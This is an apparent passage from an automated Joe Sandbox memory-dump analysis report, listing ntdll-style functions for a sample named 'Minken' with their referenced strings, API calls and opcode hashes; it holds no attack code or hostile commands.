Uniqueness Score: -1.00%

Function 2315B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 2315B702
MUI, xrefs: 2315B6D8, 2315B7E7
LdrResGetRCConfig Exit, xrefs: 2315B714

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 0fc8cb56c914822f8b66f08b4c615af21533863a43eb92e57f438770af11cbec
Instruction ID: 8880770937914af50a5bab9cb0eca72284fd8e16db759bb09fc16e9fda82147c
Opcode Fuzzy Hash: 0fc8cb56c914822f8b66f08b4c615af21533863a43eb92e57f438770af11cbec
Instruction Fuzzy Hash: 95B1DF71A047149FDB25DF69C880F9DB7B6BF44310F188AA9E961EB380D330EA91CB55

Uniqueness

Uniqueness Score: -1.00%

Function 231D368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 231D3842
DelegatedNtdll, xrefs: 231D36CE
@, xrefs: 231D389F

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: 69485a0061f248ef87469f2cd7df55c0bf6b24d1e03e2c86c1941ee18d379480
Instruction ID: c9659fcf476ad9fd24ee31c7512989b3804f83299de9e1764b67865978653c0a
Opcode Fuzzy Hash: 69485a0061f248ef87469f2cd7df55c0bf6b24d1e03e2c86c1941ee18d379480
Instruction Fuzzy Hash: A7B1CD72604349AFE311EF54CC80F5BB7E8BB46750F0149A9FA51EB280D7B4EA44CB96

Uniqueness

Uniqueness Score: -1.00%

Function 2314A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 231AC2E6
UseFilter, xrefs: 2314A1C1
\??\, xrefs: 231AC1E4

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 6990b8a96e4b65f8f536f6ce3402f6c4ef57169deb4caf990d135e42941196c9
Instruction ID: d0990fa9b8b93e3f14fe6baf28051d9d9b3037ba52b21a5b2c6e8fd6ee16e9f4
Opcode Fuzzy Hash: 6990b8a96e4b65f8f536f6ce3402f6c4ef57169deb4caf990d135e42941196c9
Instruction Fuzzy Hash: B4A17A769112299BDB219F28CC88BDAB7B8EF48711F0101EAEA09E7250D7359F85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 2318909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

%, xrefs: 231C5D3F
&, xrefs: 231C5CF8
@, xrefs: 23189148

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 1e2fb621400eeefd70f8e82fbc7ba57e5fcbe7580e736615b59fdf7deb6487d9
Instruction ID: 40deb33923e0e8b1cc648884470892c2e03024632dba8c764400595d158fedaf
Opcode Fuzzy Hash: 1e2fb621400eeefd70f8e82fbc7ba57e5fcbe7580e736615b59fdf7deb6487d9
Instruction Fuzzy Hash: 6371E1706083419FE350DF24C988A4BBBFABFA8218F148A9DF49547255C730DB49CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 2322B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

TargetNtPath, xrefs: 2322B82F
GlobalizationUserSettings, xrefs: 2322B834
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 2322B82A

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 1ca8e0ddf43abaefe14927548eea231f46f4fb8f24dd869c0278ff3b7a072d61
Instruction ID: a314835d44ec6a421e190da5226fa976d8539a91e4def6de8f68d2d5dcc40090
Opcode Fuzzy Hash: 1ca8e0ddf43abaefe14927548eea231f46f4fb8f24dd869c0278ff3b7a072d61
Instruction Fuzzy Hash: 9F616F72941A29ABDB31DF65CC88BDABBB8AF14710F0101E5E608AB250D7749FC4CF94

Uniqueness

Uniqueness Score: -1.00%

Function 2314F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 231AE6B3
HEAP[%wZ]: , xrefs: 231AE6A6
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 231AE6C6

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 7b47dd8165c31416a01db8bcbd613e36375ee68fbbfe2be4ade02b3f0b37315a
Instruction ID: 113f50f0e770c3f110e3ab492799ee2c3e5eaedbf5283c9cba7eaa282d9d41d3
Opcode Fuzzy Hash: 7b47dd8165c31416a01db8bcbd613e36375ee68fbbfe2be4ade02b3f0b37315a
Instruction Fuzzy Hash: 1951D175A00745EFE312DBA8C994F96BBF8EF05740F0444E4E6948B692D774EB50CB60

Uniqueness

Uniqueness Score: -1.00%

Function 2320C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 2320C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2320C1C5
PreferredUILanguages, xrefs: 2320C212

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 44fa1b0e01cfbe1c7eaef4390316a4dc0e147b08585823a1359ed6c055288960
Instruction ID: a450efeeba78f94df91a82af6865006496b1cfc409f40eb7d89d57515d2b94c2
Opcode Fuzzy Hash: 44fa1b0e01cfbe1c7eaef4390316a4dc0e147b08585823a1359ed6c055288960
Instruction Fuzzy Hash: 994172B1E1021AEFDB11DBD4CC81FDEB7BCAB24710F1440AAE605BB690D7749A8C8B54

Uniqueness

Uniqueness Score: -1.00%

Function 231E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 231E4172
@, xrefs: 231E4225
LdrpResValidateFilePath Enter, xrefs: 231E4160

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 5702d70ded495382b824e9b5b6294a2cc1a6e256d4df0da8d944ae015bacf674
Instruction ID: c04a1eac0203f619c5648491a88be6824a8b7c657aadc2a707a9cbb5f4033e8b
Opcode Fuzzy Hash: 5702d70ded495382b824e9b5b6294a2cc1a6e256d4df0da8d944ae015bacf674
Instruction Fuzzy Hash: 52412432A00B488BEB25DBD5D841BDCB7B8EF59380F1804DADA15EB791DB369B01CB10

Uniqueness

Uniqueness Score: -1.00%

Function 231833A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 231C29FE
Actx , xrefs: 231833AC
RtlCreateActivationContext, xrefs: 231C29F9

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: d4179afa55364e00045cd45eb30d855f1e0ac633e9bfc5a9d2e35bc680354f66
Instruction ID: 81d36ddd02a82b864e68f2da73b5ac872c69cea9bdd9d04937dab51139d9e3c4
Opcode Fuzzy Hash: d4179afa55364e00045cd45eb30d855f1e0ac633e9bfc5a9d2e35bc680354f66
Instruction Fuzzy Hash: 3F3124322103559FEF1ADF58C880F9677A4AB55B10F1948E9EE04DF292C770DA52CB94

Uniqueness

Uniqueness Score: -1.00%

Function 23181607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

LdrpInitializeTls, xrefs: 231C1A47
DLL "%wZ" has TLS information at %p, xrefs: 231C1A40
minkernel\ntdll\ldrtls.c, xrefs: 231C1A51

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 3c0e23f9e7e2a747fea49d85f193d8aa007d545555b7de9c5fd50f726c06f8db
Instruction ID: 42c7e1ffd451b492b1b4c7d259ba99357a3d6d56d7bd0655750b12b2dc4a4301
Opcode Fuzzy Hash: 3c0e23f9e7e2a747fea49d85f193d8aa007d545555b7de9c5fd50f726c06f8db
Instruction Fuzzy Hash: 34310432A00200EBF7109F48CC85F9A72BDEB60755F2545F9E680A7180D7B4EF868B98

Uniqueness

Uniqueness Score: -1.00%

Function 23191270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 2319130F
@, xrefs: 231912A5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 2319127B

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 97cc1f3948bc6d8eabaa683419bfdcd4a29699b19f74cedefbbbfbcd344d16c7
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 1C31A17590061CABEB219F95CC40EDEBBBDEB94760F0044A5E914AB1A0D730DB468B94

Uniqueness

Uniqueness Score: -1.00%

Function 231D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 231D2104
Process initialization failed with status 0x%08lx, xrefs: 231D20F3
LdrpInitializationFailure, xrefs: 231D20FA

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: bd7545fbe0e30f027460e415c780d869700e9ca2efda189680c73a6e83e72710
Instruction ID: d77566b06db069934f7726e00f46ae8d64b4914981188d178d84af547a715c0b
Opcode Fuzzy Hash: bd7545fbe0e30f027460e415c780d869700e9ca2efda189680c73a6e83e72710
Instruction Fuzzy Hash: 49F0283261024CAFE714F648CD42F953BA8EB52744F1040E4F750B7281D6B0EB01CA51

Uniqueness

Uniqueness Score: -1.00%

Function 231603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 231B4D8A

Strings

#%u, xrefs: 231B4D82

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 8277ebb141bd589fd1e232437aeca03a586a509cf5bfea2867fecd9142f807fb
Instruction ID: 1ed946308fd74913577e06885324cac7043d22171174de47b205b220d172dc5a
Opcode Fuzzy Hash: 8277ebb141bd589fd1e232437aeca03a586a509cf5bfea2867fecd9142f807fb
Instruction Fuzzy Hash: B1716A71A002499FDB11DFA8C991FAEB7F8EF18744F1580A5E904E7251EB34EE51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 231F705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231F70C2

Strings

kLsE, xrefs: 231F70A4

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: aa1849231ce6226686587cc4f0202f1df6dcf265cae74026189f6bd0d381707f
Instruction ID: 4fbb10df9f6603082247bfbf60dd122f0d82a36f80ee22d062efc839315fd744
Opcode Fuzzy Hash: aa1849231ce6226686587cc4f0202f1df6dcf265cae74026189f6bd0d381707f
Instruction Fuzzy Hash: C8415C7250135047E721BB60CD88BA53BE4EF60B94F2482E9EF649A1C1C7BC96C5C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 231652A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 23165445
@, xrefs: 231655A3

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: db8b694896c3871a4c9a812f012af1d491314f5b9170da1ae49a30094388e782
Instruction ID: a3e4f7e167bdeaac8735291493816b07b090aef344e754b0d129887dbbe49251
Opcode Fuzzy Hash: db8b694896c3871a4c9a812f012af1d491314f5b9170da1ae49a30094388e782
Instruction Fuzzy Hash: 9332AC705083118BC724DF55C480BAEB7F6EF94740F1949AEFA859B290E734DAA0CF96

Uniqueness

Uniqueness Score: -1.00%

Function 23155702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 23155778
RtlDebugPrintTimes.NTDLL ref: 231B0816

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2301f77ce9975fd67484fa6b28db4fd8d3d92afab73d11ccaafbb130abd8fbc5
Instruction ID: 602e4f4ce5e325c97722d120ad9e3bb343d1772ff9cbca26c8642132b7e90628
Opcode Fuzzy Hash: 2301f77ce9975fd67484fa6b28db4fd8d3d92afab73d11ccaafbb130abd8fbc5
Instruction Fuzzy Hash: E031D031601B06EFC7959B60CD80E89FBBAFF54754F4450A5E92147A51DBB0EB20CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 2321A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 2321A44B
`, xrefs: 2321A551

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 2bb2740705768dd88498def62278cea9ffa3ac1f007ea1ea55c1182ab4f1faa9
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 9EC113322143429BDB24CF24CE40B1BBBE5BF84314F084A6CF6D5C6292D774D695CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 2316F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 2316F7F6
$, xrefs: 2316F860

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 9950915e44ec8dba00d36f74f3d2b9b81c5f8a271191cc986f959ef51e6fc805
Instruction ID: 3c78396e9f4808c44eeb458190c4edc27998aa6c8c93b68a1f988ffff3d8156b
Opcode Fuzzy Hash: 9950915e44ec8dba00d36f74f3d2b9b81c5f8a271191cc986f959ef51e6fc805
Instruction Fuzzy Hash: 7B61B871A01749DBDB20DFA4C984B99B7BAFF44304F1440E9E614AB685CB34ABA5CF80

Uniqueness

Uniqueness Score: -1.00%

Function 2315A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 2315A309
RtlpResUltimateFallbackInfo Enter, xrefs: 2315A2FB

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 7a247724b22a45f977674b77219d805887ec912502d75529a358db8bc6a4d567
Instruction ID: 6cc03e98fe97ed21a0b562cf7adbf8b480e40444f44eac98bdd205b8b7652ebc
Opcode Fuzzy Hash: 7a247724b22a45f977674b77219d805887ec912502d75529a358db8bc6a4d567
Instruction Fuzzy Hash: B741EB31A40708CBCB16DF69C890BAA77B4FF94304F2480E9ED20DB2A1E674CB49CB44

Uniqueness

Uniqueness Score: -1.00%

Function 2318329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 2318330D
.Local\, xrefs: 231832B5

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: d79ec13aa952ea386d138a09d419e6df7a496afdbf06500698f83ccd3e251c98
Instruction ID: b8bb125d2d18990965a6f34aedc02910e268ed0cbb0a1d9507ef8bda178ea879
Opcode Fuzzy Hash: d79ec13aa952ea386d138a09d419e6df7a496afdbf06500698f83ccd3e251c98
Instruction Fuzzy Hash: E231C1761083049FE320DF28C480A8BBBE8EB84654F490D6EF99483250DA30DF05CF96

Uniqueness

Uniqueness Score: -1.00%

Function 2315C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 2315C8C3, 2315CA40

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 279faadd9adc018f3ee6e3971ed1d2005babdeab69e1d77263ca3e8e17ad6c46
Instruction ID: 9ca1b59c0de420686e12588b6405f2a83b4ecaaf5e85527b32a3dbc44614c7ca
Opcode Fuzzy Hash: 279faadd9adc018f3ee6e3971ed1d2005babdeab69e1d77263ca3e8e17ad6c46
Instruction Fuzzy Hash: 27826A75E002198FDB24DFA9C880BDDBBB5FF48350F1481AAE929AB351D7709A81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 231FA118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231FA13A

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6d1aa34f0c88420e99e363f5e0eea50c34d8bd0fa9ed0297cfdc35cd4e0c74f2
Instruction ID: d6a6c753e394c511f5a82092d9279117c4251b8404324fe66d94e8141d225453
Opcode Fuzzy Hash: 6d1aa34f0c88420e99e363f5e0eea50c34d8bd0fa9ed0297cfdc35cd4e0c74f2
Instruction Fuzzy Hash: 2422BC742047518BD714DF29C090BB2B7F1AF44340F0985DAEA868B2E6E73DE692CF64

Uniqueness

Uniqueness Score: -1.00%

Function 2317B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

@[$#@[$#, xrefs: 2317B2DC

Memory Dump Source

